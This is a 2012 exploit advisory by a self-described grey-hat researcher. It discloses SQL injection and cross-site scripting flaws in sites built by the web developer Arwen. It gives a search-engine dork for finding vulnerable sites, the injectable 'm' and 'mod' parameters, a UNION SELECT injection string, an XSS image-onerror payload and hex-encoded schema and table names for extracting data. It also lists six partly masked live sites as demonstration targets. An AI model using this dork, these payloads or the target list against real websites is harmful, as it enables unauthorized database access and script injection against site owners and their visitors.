_ _ _____ ___ ____ ___ _____ _____ __
| | | | __ \ / _ \| _ \ / _ \| __ \ / _ \ \ / /
| | | | |__) | | | | |_) | | | | |__) | | | \ V /
| | | | _ /| | | | _ <| | | | _ /| | | |> <
| |__| | | \ \| |_| | |_) | |_| | | \ \| |_| / . \
\____/|_| \_\\___/|____/ \___/|_| \_\\___/_/ \_\
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
INDEPENDENT SECURITY RESEARCHER
PENETRATION TESTING SECURITY
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
# Author: Ur0b0r0x
# Tiwtte: @Ur0b0r0x
# Email: ur0b0r0x_4n1@live.com
# Line: GreyHat
# Exploit Title: Arwen - SQL Injection / Cross-Site Scripting Vulnerabilities
# Dork: intext:"website realizado por Arwen desarrollo web y diseño"
# Date: 06/11/2012
# Author: Ur0b0r0x
# Url Vendor: http://www.arwen-dyd.com/
# Vendor Name: Arwen
# Tested On: Backtrack R3 / Linux Mint
# Type: php
------------------- Agreement --------------------
[03/11/2012] - Vulnerability discovered
[05/11/2012] - Vendor notified Dont responsed
[06/11/2012] - Public disclosure
--------------------------------------------------
# Expl0it/P0c ###################
http://site.com/index.php?m= < Sql Vulnerability Path >
http://site.com/index.php?mod= < Sql Vulnerability Path >
http://site.com/index.php?m= < Xss Vulnerability Path >
http://site.com/index.php?mod= < Xss Vulnerability Path >
# Exploit/Comand/Sql=> +union+select+1,2,3,4--+
# Exploit/Comand/Xss=> "><img src=x onerror=alert("ur0b0r0x");>
# Payload/Comand/Sql=> table_schema=0x6E6F7469636961736761646F73 / table_name=0x626464766761626F
# Demo_Xss_Sql_Vulnerabilities
http://www.arXXdyd.com/index.php?m=1'
http://www.mXXoambientalpamplona.com/index.php?mod=1'
http://www.raulXXinabeitia.com/grupos.php?mod=1'
http://www.aeXXXna.com/index.php?m=1'
http://www.nexXXXgabinete.com/index.php?mod=1'
http://www.boXXXosdenavarra.com/index.php?m=1'
# Gr3t'x #########################
>> | Mr.Pack | Nick Nitrous | Revolution_Hackers | Dylan Irzi | R00tc0d3r's | SecurityDev | Mafia Dz | Algerian Hacker |
>> And All H4x0r5